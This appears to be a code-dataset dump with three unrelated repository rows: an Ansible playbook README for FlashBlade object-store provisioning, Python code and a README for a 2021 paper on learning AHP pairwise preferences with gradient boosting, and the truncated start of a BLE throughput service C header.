"text": "FlashBlade Object Store Account, User, and Bucket Configuration\n=========\n\nAnsible playbook for FlashBlade Object Store account, user, and bucket configuration.\n\n\nRequirements\n------------\n\n**Requires: Python >=2.7, <=3.6 to be installed on the Ansible control node.**\n\nThe Python version on the Ansible control node must match the version required by the FlashBlade Python SDK (purity_fb): Python >=2.7, <=3.6\n\n* Install python-pip on Ansible control node, if it is not already installed.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n \n* Install dependencies using the \"requirements.txt\" in the directory of this README file. (This ensures that ansible, purity-fb, netaddr, and pytz are installed):\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install the FlashBlade Ansible Collection: \n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nGenerating FlashBlade Login Credentials for Ansible Playbooks\n--------------\n\nFlashBlade Ansible playbooks require an API token to connect to FlashBlade. An API token can be obtained by using ssh to connect to the FlashBlade management IP for a user that you wish the Ansible playbook to run as, and using the ```pureadmin``` command to retrieve or create an API token.\n\nTo create or retrieve an API token, first ssh to a FlashBlade as the user you wish the Ansible playbooks to run as. For example, to create an API token with full admin privileges equivalent to \"pureuser\", the built-in local administrator account, ssh to FlashBlade's management IP as \"pureuser\" and specify that user's password:\n ```\n ssh [email protected]\n ```\nTo see current the logged-in user's API token:\n ```\n pureadmin list --api-token --expose\n ```\nTo create an API token expiring in 24 hours with the same permissions as the currently logged in user:\n ```\n pureadmin create --api-token --timeout 1d\n ```\nThe above commands generates output like the following:\n ```\n Name API Token Created Expires\n pureuser T-85cc9ce8-643d-4d99-8dbc-656f38cacab0 2020-09-13 23:55:33 PDT 2020-09-14 23:55:33 PDT\n ```\nFor details, see \"Creating an API token\" in the [FlashBlade User Guide](https://support.purestorage.com/FlashBlade/Purity_FB/FlashBlade_User_Guides).\n\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\" \n\n\nSpecifying FlashBlade API credentials for this playbook\n--------------\n\nThis playbook supports organizing your FlashBlade credentials and configuration details into groups of FlashBlade arrays referred to here as \"environments\".\n\nTo specify credentials for this playbook to log into FlashBlade, create a file (relative to this playbook's location) at\n ```\n var/<your_env_name>/fb_secrets.yml\n ```\nwhere <your_env_name> is a name you assign to a group of one or more FlashBlade arrays.\n\nThe fb_secrets.yml file should look like this:\n ```\n ---\n array_secrets:\n FlashBlade1: # this must match the identifier used for this FlashBlade in fb_details.yml\n api_token: T-0b8ad89c-xxxx-yyyy-85ed-28660EXAMPLE # API token obtained from FlashBlade\n\n s3_ansible_vault_pass: somepassword # Required in order to encrypt s3 secret files \n ```\n\nFor an example of an fb_secrets.yml file, see:\n ```\n var/region/fb_secrets.yml\n ```\n\nSpecifying FlashBlade connection details and Object Store configuration\n--------------\n\nTo configure your FlashBlade connection details and the Object Store account, user, and bucket names you would like to provision, create a file at:\n ```\n var/<your_env_name>/fb_details.yml\n ```\n\nThe fb_details.yml file should look similar to this:\n ```\n array_inventory: \n FlashBlade1: # this must match the identifier used for this FlashBlade in fb_secrets.yml\n fb_url: 10.20.30.40\n object_store:\n - account: your-account\n state: enabled\n users: \n - {name: your-object-store-user, create_new_access_key: true, state: enabled}\n buckets: \n - {name: your-bucket-name, state: enabled, eradicate: false, versioning: enabled} \n ```\n\nAs an example of an fb_details.yml file, see:\n ```\n /var/region/fb_details.yml\n ```\n\n\nRunning this playbook\n--------------\n\nTo run this playbook, specify the playbook name and your environment name at the command line:\n ```bash\n ansible-playbook object_store_setup.yml -e \"env=<your_env_name>\"\n ```\n\nUsing Ansible Vault to Encrypt FlashBlade Credentials\n--------------\n\nIt is strongly recommended that you avoid storing FlashBlade API credentials in a plain text file.\n\nYou can use Ansible Vault to encrypt your FlashBlade API credentials using a password that can be specified later at the command line when running your playbook.\n\nTo encrypt the fb_secrets.yml file, first specify a password in the `s3_ansible_vault_pass` variable in \"fb_secrets.yml\" file (for use by the playbook itself during execution) and then run\n ```\n ansible-vault encrypt fb_secrets.yml\n ```\nEnter the same password when prompted to encrypt the file.\n\nTo execute a playbook using an encrypted fb_secrets.yml file:\n ```bash\n ansible-playbook object_store_setup.yml -e \"env=<your_env_name>\" --ask-vault-pass\n ```\nEnter Ansible Vault password that was used to encrypt \"fb_secrets.yml\" file.\n\n\nNotes on using this playbook\n--------------\n\n#### Note\n * To destroy any of the bucket use `state: disabled` in \"buckets\" section of `fb_details.yml` variable file. Destroyed bucket have 24 hours to be recovered. To recover bucket, run the playbook with `state: enabled` within 24 hours of deletion. Buckets can be eradicated by using `state: disabled` and `eradicate: true` together.\n\n\nExamples\n--------------\n ##### fb_details.yml for different scenarios \n \n **Create Object-store Account, user and bucket**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n state: enabled\n users: \n - { name: user1, create_new_access_key: true, state: enabled }\n buckets: \n - { name: bucket1, state: enabled, eradicate: false, versioning: enabled } \n ```\n \n **Destroy Bucket**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n buckets: \n - { name: bucket1, state: disabled } \n ```\n **Recover Bucket**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n buckets: \n - { name: bucket1, state: enabled } \n ```\n **Eradicate Bucket**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n buckets: \n - { name: bucket1, state: disabled, eradicate: true } \n ``` \n **Create User with key**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n users: \n - { name: user1, create_new_access_key: true } \n ```\n **Create User without key**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n users: \n - { name: user1, create_new_access_key: false } \n ```\n * To extend the Object-store provisioning on the fleet of FlashBlade Arrays, Add multiple \"FlashBlade1...N\" blocks under array_inventory in \"fb_details.yml\" file.\n Example configuration to setup Object-Store on two FlashBlade servers.\n \n **fb_details.yml**\n ```\n array_inventory: \n FlashBlade1:\n fb_url: 10.22.222.151 \n object_store:\n - account: account1\n state: enabled\n users: \n - { name: user1, create_new_access_key: true, state: enabled }\n buckets: \n - { name: bucket1, state: enabled, eradicate: false, versioning: enabled }\n FlashBlade2:\n fb_url: 10.22.222.152 \n object_store:\n - account: account2\n state: enabled\n users: \n - { name: user2, create_new_access_key: true, state: enabled }\n buckets: \n - { name: bucket2, state: enabled, eradicate: false, versioning: enabled } \n ```\n **fb_secrets.yml**\n ```\n array_secrets: \n FlashBlade1:\n api_token: T-0b8ad89c-xxxx-yyyy-85ed-286607dc2cd2\n FlashBlade2:\n api_token: T-0b8ad822-xxxx-yyyy-85ed-286607dc2cd2\n \n s3_ansible_vault_pass: pureansible # Required to encrypt s3 secret files \n ```\n\nOther notes\n--------------\n\n* If creating S3 credentials for a user (`create_new_access_key: true`), s3_secrets will be stored in an encypted file with name `<account_name>_<user_name>.yml` at path `vars/<environment_name>/s3_secrets/`. Use ansible vault to decrypt the s3_secrets file(s).\n ```\n ansible-vault decrypt <s3_secrets_filename> --ask-vault-pass\n ```\n Enter vault password(`s3_ansible_vault_pass`) when prompted.\n* A maximum of 2 access keys are allowed per user, so after running this playbook twice with `create_new_access_key: true` parameter, there will be no attempt to create a new access key.\n\n\n"
}
] | 15 |
mvoicer/cbic-2021-learning-preferences | https://github.com/mvoicer/cbic-2021-learning-preferences | 69eac1ec28a83f654eb4690ff9cdd092ae756ba8 | 9ddd5449d5cae5a8f1cdafc6fa34b13ee83076b2 | 23282a99796fdc8890220f757692b23040db2808 | refs/heads/main | 2023-08-23T14:35:47.511509 | 2021-10-05T03:30:56 | 2021-10-05T03:30:56 | 400,648,625 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5224466919898987,
"alphanum_fraction": 0.5448933839797974,
"avg_line_length": 28.724138259887695,
"blob_id": "96b1f509c37ed40ea328cb0f3815cccead99b30d",
"content_id": "7f7262377b4d75ac9411ebec862908e7bf0da56b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1782,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 58,
"path": "/preferences.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport pandas as pd\r\n\r\n\r\n# Define Saaty's 1-9 Scale for AHP Preference\r\ndef matrix_intervalos(A):\r\n max_A = np.max(A, axis=0)\r\n min_A = np.min(A, axis=0)\r\n I = np.zeros(shape=(9, len(max_A)))\r\n for i, (menor, maior) in enumerate(zip(min_A, max_A)):\r\n intervalos = np.linspace(menor, maior, 9)\r\n I[:, i] = intervalos.ravel()\r\n return I\r\n\r\n# Calculate the differences among the nominal values of the objectives\r\ndef my_cdist(df_obj):\r\n n_row = df_obj.shape[0]\r\n m1 = np.tile(df_obj, (n_row, 1))\r\n m2 = np.tile(df_obj.reshape(-1, 1), (1, n_row))\r\n return m2 - m1\r\n\r\n# Calculate the preferences\r\ndef preferencia(df_dif, interval):\r\n\r\n df_pref = np.ones(shape = df_dif.shape)\r\n\r\n it = np.nditer(df_dif, flags=['multi_index'])\r\n\r\n for x in it:\r\n for j, _ in enumerate(interval):\r\n if j == len(interval):\r\n df_pref[it.multi_index] = 9 if x < 0 else 1.0 / 9.0\r\n # df_pref[it.multi_index] = 1.0 / 9.0 if x > 0 else 9\r\n break\r\n\r\n if interval[j] <= np.abs(x) <= interval[j + 1]:\r\n df_pref[it.multi_index] = 1.0 / (j + 1) if x < 0 else j + 1\r\n # df_pref[it.multi_index] = j+1 if x > 0 else 1.0 / (j + 1)\r\n break\r\n return df_pref.round(3)\r\n\r\n\r\ndef notas_pref(A):\r\n df_pref = pd.DataFrame()\r\n I = matrix_intervalos(A)\r\n\r\n # For each objective\r\n for i, sol in enumerate(A.T):\r\n # Calculate the difference among the values\r\n df_dif = my_cdist(sol)\r\n # Get the intervals\r\n interval = I[:, i]\r\n # Generate the PC matrices\r\n pp = pd.DataFrame(preferencia(df_dif, interval), index=None)\r\n\r\n df_pref = pd.concat([df_pref, pp], axis=1)\r\n\r\n return df_pref\r\n"
},
{
"alpha_fraction": 0.6106911301612854,
"alphanum_fraction": 0.6252699494361877,
"avg_line_length": 31.469879150390625,
"blob_id": "b97f75addeb7e051fad165dd1eb902b28b306544",
"content_id": "b63c5e4da0bf546ccf53425d136cecb05f642f45",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5556,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 166,
"path": "/main.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport random\r\nimport pickle\r\nfrom tqdm import tqdm\r\nimport seaborn as sns\r\nfrom sklearn.metrics import *\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom preferences import notas_pref\r\nfrom ahp import ahp\r\nfrom data_preparation import create_subsample\r\nfrom fine_tunning import fine_tunning\r\nfrom data_preparation import merge_matrices\r\nfrom tau_distance import normalised_kendall_tau_distance\r\n\r\nlen_Q = 5 # n_samples to be evaluated\r\nCV = 5 # number of cross-validation\r\ntest_size = 0.2 # 80% train and 20% test\r\naccepted_error = .05 # max tau distance accepted between current ranking and the predicted one\r\n\r\ndf_var = pd.read_csv(\"dec_5obj_p2.csv\", header=None) # decision variables\r\n# df_var = df_var.iloc[0:55, :].round(5)\r\ndf_obj = pd.read_csv('obj_5obj_p2.csv', header=None) # values in Pareto front\r\n# df_obj = df_obj.iloc[0:55, :].round(5)\r\n\r\nnpop, nvar = df_var.shape\r\nnobj = df_obj.shape[1]\r\n\r\n# Generate the preferences\r\ndf_obj = df_obj.to_numpy()\r\ndf_pref = notas_pref(df_obj)\r\n\r\n# AHP from the original alternatives\r\nrank_ahp = ahp(df_pref).index\r\n\r\n# Generate the index to be evaluated\r\nindex = list(df_var.index)\r\n\r\n# Aleatory ranking\r\naleatory = index.copy()\r\nrandom.shuffle(aleatory)\r\n\r\n# Start an aleatory ranking\r\nrank_aleatory = aleatory.copy()\r\n\r\n# Distances\r\ncurrent_previous = []\r\ncurrent_ahp = []\r\n\r\n# Metrics\r\nmse = []\r\nrmse = []\r\nr2 = []\r\nmape = []\r\n\r\n# Iterations\r\niteration = []\r\ncont = 0\r\n\r\ntemp = 1\r\nfor aux in tqdm(range(len_Q, npop, len_Q)):\r\n cont += 1\r\n\r\n # Define Q and N-Q indexes\r\n Q_index = aleatory[0:aux]\r\n N_Q_index = [x for x in index if x not in Q_index]\r\n\r\n # Train\r\n df_Q = create_subsample(df_var=df_var, df_pref=df_pref, nobj=nobj, index=Q_index)\r\n X_train = df_Q.iloc[:, :-nobj] # to predict\r\n y_train = df_Q.iloc[:, -nobj:] # real targets\r\n # Test\r\n df_N_Q = create_subsample(df_var=df_var, df_pref=df_pref, nobj=nobj, index=N_Q_index)\r\n X_test = df_N_Q.iloc[:, :-nobj] # to predict\r\n y_test = df_N_Q.iloc[:, -nobj:] # real targets\r\n\r\n # Model training\r\n if temp > accepted_error:\r\n tuned_model = fine_tunning(CV, X_train, y_train)\r\n with open(\"tuned_model_cbic_5obj.pkl\", 'wb') as arq: # Save best model\r\n pickle.dump(tuned_model, arq)\r\n tuned_model.fit(X_train, y_train)\r\n else:\r\n with open(\"tuned_model_cbic_5obj.pkl\", \"rb\") as fp: # Load trained model\r\n tuned_model = pickle.load(fp)\r\n\r\n # Model evaluation\r\n y_pred = tuned_model.predict(X_test)\r\n y_pred = pd.DataFrame(y_pred)\r\n\r\n # Metrics\r\n mse.append(mean_squared_error(pd.DataFrame(y_test.values), pd.DataFrame(y_pred.values), squared=True))\r\n rmse.append(mean_squared_error(pd.DataFrame(y_test.values), pd.DataFrame(y_pred.values), squared=False))\r\n r2.append(r2_score(pd.DataFrame(y_test.values), pd.DataFrame(y_pred.values)))\r\n mape.append(mean_absolute_percentage_error(pd.DataFrame(y_test.values), pd.DataFrame(y_pred.values)))\r\n\r\n # Merge the predictions of the df train and df test\r\n df_merged = merge_matrices(N_Q_index, df_pref, y_pred)\r\n\r\n # Employ AHP in the predicted (mixed with preferences) dataset\r\n rank_predicted = ahp(df_merged).index\r\n\r\n # Calculate distances\r\n temp = normalised_kendall_tau_distance(r1=rank_aleatory, r2=rank_predicted)\r\n current_previous.append(temp)\r\n current_ahp.append(normalised_kendall_tau_distance(r1=rank_ahp, r2=rank_predicted))\r\n\r\n # df_obj = pd.DataFrame(df_obj)\r\n # plt.scatter(df_obj.loc[:, 0], df_obj.loc[:, 1], color='b') # available\r\n # plt.scatter(df_obj.loc[rank_predicted[0:aux], 0], df_obj.loc[rank_predicted[0:aux], 1], color='r',\r\n # marker='^') # top ranked\r\n # plt.scatter(df_obj.loc[rank_ahp[0:aux], 0], df_obj.loc[rank_ahp[0:aux], 1], color='g', marker='*') # ahp\r\n # plt.legend([\"Available\", \"Top ranked\", 'AHP'])\r\n # plt.show()\r\n\r\n # Update the ranking\r\n rank_aleatory = rank_predicted\r\n\r\n # Storage the iterations\r\n iteration.append(cont)\r\n\r\n # if cont == 10:\r\n # break\r\n\r\n# Merge the results\r\nresults = pd.DataFrame({'Iteration': iteration,\r\n 'MSE': mse,\r\n 'RMSE': rmse,\r\n 'R2': r2,\r\n 'MAPE': mape,\r\n 'Current_Previous': current_previous,\r\n 'Current_AHP': current_ahp})\r\n\r\nresults_metrics = results[['Iteration', 'MSE', 'RMSE', 'R2', 'MAPE']]\r\nresults_tau = results[['Iteration', 'Current_Previous', 'Current_AHP']]\r\n\r\nfig, ax = plt.subplots()\r\nsns.lineplot(x='Iteration',\r\n y='value',\r\n hue='variable',\r\n data=pd.melt(results_metrics, \"Iteration\"))\r\nax.legend([\"MSE\", \"RMSE\", 'R2', 'MAPE'])\r\nplt.ylabel(\"Error metric\")\r\n# plt.show()\r\nplt.savefig('error_metric_cbic_5obj__.png')\r\nplt.close(fig) # close the figure window\r\n\r\nfig, ax = plt.subplots()\r\nsns.lineplot(x='Iteration',\r\n y='value',\r\n hue='variable',\r\n data=pd.melt(results_tau, \"Iteration\"))\r\nax.legend([\"Current vs Previous\", 'Current vs AHP'])\r\nax.set_ylim(0, 1)\r\nplt.ylabel(\"Tau similarity\")\r\nplt.axhline(y=.05, ls=':', color='red', marker='*')\r\n# plt.show()\r\nplt.savefig('similarity_cbic_5obj__.png')\r\nplt.close(fig) # close the figure window\r\n\r\n# Select top10 to plot\r\ntop10_pred = rank_predicted[0:10]\r\nselect_top10 = pd.DataFrame(df_obj)\r\nselect_top10 = select_top10.iloc[top10_pred, :]\r\nselect_top10.round(4)\r\nselect_top10.to_csv(\"selected_top10_cbic_5obj_.csv\")\r\n"
},
{
"alpha_fraction": 0.5738396644592285,
"alphanum_fraction": 0.5822784900665283,
"avg_line_length": 21.899999618530273,
"blob_id": "04266f7a14c8ab72129152fc1fe147116aa6dde9",
"content_id": "a2ba02a8230848c0c7711aec40a500e0258b01cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 10,
"path": "/ahp.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\n\r\n\r\ndef ahp(df):\r\n \"\"\"\r\n Define the AHP method\r\n :param df: preference matrix\r\n :return: ranking\r\n \"\"\"\r\n return ((df / df.apply('sum', axis = 0)).apply(\"sum\", axis = 1)).sort_values(ascending=False)"
},
{
"alpha_fraction": 0.5990663766860962,
"alphanum_fraction": 0.6058091521263123,
"avg_line_length": 33.703704833984375,
"blob_id": "fabc4caa5cec23f9f4b296bba9c207537502c90f",
"content_id": "f77c699c0cad28049b25cea8de2b4a3880e31a0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1930,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 54,
"path": "/data_preparation.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef create_subsample(df_var, df_pref, nobj, index):\r\n \"\"\"\r\n Create sub-dataframes with the features (alternatives) and target (value in the objective space).\r\n :param df_var:\r\n :param df_pref:\r\n :param nobj:\r\n :param index:\r\n :return:\r\n \"\"\"\r\n\r\n # Create a df_aux that receive the features concatenated (objectives) and targets (preference)\r\n sub_df = pd.DataFrame(np.zeros((len(index), df_var.shape[1]*2 + nobj)))\r\n cont = 0\r\n for i in index:\r\n for j in index:\r\n # Concatenate the two rows - i.e. values of the objectives\r\n # and the preference between the two objectives\r\n sub_df.loc[cont] = pd.concat([df_var.loc[i], df_var.loc[j], df_pref.loc[i, j]], axis = 0, ignore_index = True)\r\n cont += 1\r\n return sub_df\r\n\r\ndef merge_matrices(idx_N_Q, preference_matrix, ml_predicted):\r\n \"\"\"\r\n Replace the predicted values in the preference matrix to calculate\r\n if the rankings (predicted vs preference) are equal or not.\r\n :param idx_N_Q: N-Q index\r\n :param preference_matrix: preference matrix\r\n :param ml_predicted: ranking obtained with the ML method\r\n :return: dataframe merged with the real values and the predicted values\r\n \"\"\"\r\n df_merged = preference_matrix.copy()\r\n nobj = ml_predicted.shape[1]\r\n\r\n # Gera todas as combinações do N-Q\r\n comb_idx = []\r\n for i in idx_N_Q:\r\n for k in idx_N_Q:\r\n comb_idx.append(tuple([i, k]))\r\n\r\n results = pd.DataFrame()\r\n x = 0\r\n for _ in range(0, df_merged.shape[1], df_merged.shape[0]):\r\n m = df_merged.iloc[:, nobj:nobj+df_merged.shape[0]].to_numpy()\r\n\r\n for i, idx in enumerate(comb_idx):\r\n m[idx] = ml_predicted.values[i, x]\r\n x += 1\r\n m = pd.DataFrame(m)\r\n results = pd.concat([results, m], ignore_index=False, axis=1)\r\n return results\r\n"
},
{
"alpha_fraction": 0.2960091829299927,
"alphanum_fraction": 0.31323572993278503,
"avg_line_length": 57.06779479980469,
"blob_id": "e5a190dd4a67c687689f3ba12b31f7379999f791",
"content_id": "761be66b364a67808d5bfb58d0a9be7cb1228f7a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3483,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 59,
"path": "/fine_tunning.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "from sklearn.multioutput import MultiOutputRegressor\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\n\r\ndef fine_tunning(CV, X, y):\r\n \"\"\"\r\n Search the best parameters for the Gradient Boosting Regressor model.\r\n \"\"\"\r\n model = MultiOutputRegressor(GradientBoostingRegressor(loss='ls',\r\n learning_rate=0.001,\r\n n_estimators=500,\r\n subsample=1.0,\r\n criterion='friedman_mse',\r\n min_samples_split=10,\r\n min_samples_leaf=1,\r\n min_weight_fraction_leaf=0.0,\r\n max_depth=30,\r\n min_impurity_decrease=0.0,\r\n min_impurity_split=None,\r\n init=None,\r\n random_state= 42,\r\n max_features=None,\r\n alpha=0.9,\r\n verbose=0,\r\n max_leaf_nodes=None,\r\n warm_start=False,\r\n validation_fraction=0.1,\r\n n_iter_no_change=None,\r\n tol=0.0001,\r\n ccp_alpha=0.0))\r\n\r\n hyperparameters = dict(estimator__learning_rate=[0.05],\r\n estimator__loss=['ls'],\r\n estimator__n_estimators=[500, 1000],\r\n estimator__criterion=['friedman_mse'],\r\n estimator__min_samples_split=[7, 10],\r\n estimator__max_depth=[15, 30],\r\n estimator__min_samples_leaf=[1, 2],\r\n estimator__min_impurity_decrease=[0],\r\n estimator__max_leaf_nodes=[5, 30])\r\n\r\n randomized_search = RandomizedSearchCV(model,\r\n hyperparameters,\r\n random_state=42,\r\n n_iter=5,\r\n scoring=None,\r\n n_jobs=-1,\r\n refit=True,\r\n cv=CV,\r\n verbose=True,\r\n pre_dispatch='2*n_jobs',\r\n error_score='raise',\r\n return_train_score=True)\r\n\r\n hyperparameters_tuning = randomized_search.fit(X, y)\r\n\r\n tuned_model = hyperparameters_tuning.best_estimator_\r\n\r\n return tuned_model"
},
{
"alpha_fraction": 0.5822649598121643,
"alphanum_fraction": 0.6047008633613586,
"avg_line_length": 29.200000762939453,
"blob_id": "b3ce8d70631d4890141228151f78ee73ac8661dd",
"content_id": "0556de65d2e4fc4039eed11646c130ae97429a90",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 936,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 30,
"path": "/tau_distance.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import scipy.stats as stats\r\nimport numpy as np\r\n\r\n\r\ndef tau_distance(r1, r2):\r\n \"\"\"\r\n Tau distance\r\n Values close to 1 indicate strong agreement,\r\n and values close to -1 indicate strong disagreement.\r\n :param r1: list1\r\n :param r2: list2\r\n :return: tau distance between two lists\r\n \"\"\"\r\n tau, p_value = stats.kendalltau(r1, r2)\r\n return tau\r\n\r\ndef normalised_kendall_tau_distance(r1, r2):\r\n \"\"\"\r\n Compute the normalized Kendall tau distance.\r\n :param r1: list1\r\n :param r2: list2\r\n :return: normalized tau distance between two lists\r\n \"\"\"\r\n n = len(r1)\r\n assert len(r2) == n, \"Both lists have to be of equal length\"\r\n i, j = np.meshgrid(np.arange(n), np.arange(n))\r\n a = np.argsort(r1)\r\n b = np.argsort(r2)\r\n ndisordered = np.logical_or(np.logical_and(a[i] < a[j], b[i] > b[j]), np.logical_and(a[i] > a[j], b[i] < b[j])).sum()\r\n return ndisordered / (n * (n - 1))\r\n"
},
{
"alpha_fraction": 0.7564841508865356,
"alphanum_fraction": 0.7853025794029236,
"avg_line_length": 121.29412078857422,
"blob_id": "84d7f0501aa1c7db29b44971c5d4718dc75fb12f",
"content_id": "7b2d9848c1ce35b052b4ab97e53cae971bb297bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2082,
"license_type": "permissive",
"max_line_length": 1398,
"num_lines": 17,
"path": "/README.md",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "# cbic-2021-learning-preferences\nPaper published in CBIC2021 entitled \"Learning Pairwise Comparisons with Machine Learning for Large-Scale Multi-Criteria Decision Making Problems\"\nDOI: 10.21528/CBIC2021-13\n\nAbstract: Decision making is a complex task and requires a lot of cognitive effort from the decision maker. Multi-criteria methods, especially those based on pairwise comparisons, such as the Analytic Hierarchic Process (AHP), are not viable for large-scale decision-making problems. For this reason, the aim of this paper is to learn the preferences of the decision-maker using machine learning techniques in order to reduce the number of queries that are necessary in decision problems. We used a recently published parameterized generator of scalable and customizable benchmark problems for many-objective problems as a large-scale data generator. The proposed methodology is an iterative method in which a small subset of solutions are presented to the decision-maker to obtain pairwise judgments. This information is fed to an algorithm that learns the preferences for the remaining pairs in the decision matrix. The Gradient Boosting Regressor was applied in a problem with 5 criteria and 210 solutions. Subsets of 5, 7 and 10 solutions were used in each iteration. The metrics MSE, RMSE, MAPE and R2 were calculated. After the 8th iteration the ranking similarity stabilized, as measured by the tau distance. As the main advantage of the proposed approach is that it was necessary only 8 iterations presenting 5 solutions per time to learn the preferences and get an accurate final ranking. \n\n@INPROCEEDINGS{CBIC2021-13,\n TITLE=\t\t{Marcos Antonio Alves, Ivan Reinaldo Meneghini and Frederico Gadelha Guimaraes.},\n AUTHOR=\t\t{Learning Pairwise Comparisons with Machine Learning for Large-Scale Multi-Criteria Decision Making Problems},\n PAGES=\t\t{1-7},\n BOOKTITLE=\t{Anais do 15 Congresso Brasileiro de Inteligencia Computacional},\n EDITOR=\t\t{Carmelo Jose Albanez Bastos Filho and Hugo Valadares Siqueira and Danton Diego Ferreira and Douglas Wildgrube Bertol and Roberto Celio Limao de Oliveira},\n PUBLISHER=\t{SBIC},\n ADDRESS=\t{Joinville, SC},\n YEAR=\t\t{2021},\n DOI= {10.21528/CBIC2021-13}\n }\n \n"
}
] | 7 |
rlatrifork/ble_examples_test | https://github.com/rlatrifork/ble_examples_test | dbf9c60a75698322603e43ae50b6a81b87d3f7cf | 227a8139a48d5780aacdd8173e2b582a90431a07 | 35e63ec2c7d7b4920f068df7ac3feb969c6854ae | refs/heads/master | 2021-05-15T19:13:50.533326 | 2017-10-20T13:42:03 | 2017-10-20T13:42:03 | 107,681,309 | 1 | 2 | null | null | null | null | null | [
{
"alpha_fraction": 0.6035353541374207,
"alphanum_fraction": 0.6124708652496338,
"avg_line_length": 33.55033493041992,
"blob_id": "adf5515f114ffc5b362d339070f24f55489a67f7",
"content_id": "38fbd63d1c64b9ca7a63cfcd7ab90d96d15e5880",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5148,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 149,
"path": "/source/ti/ble5stack/profiles/throughput/throughput_service.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/**********************************************************************************************\n * Filename: Throughput_Service.h\n *\n * Description: This file contains the Throughput_Service service definitions and\n * prototypes.\n *\n * Copyright (c) 2015-2017, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n *************************************************************************************************/\n\n\n#ifndef _THROUGHPUT_SERVICE_H_\n#define _THROUGHPUT_SERVICE_H_\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * 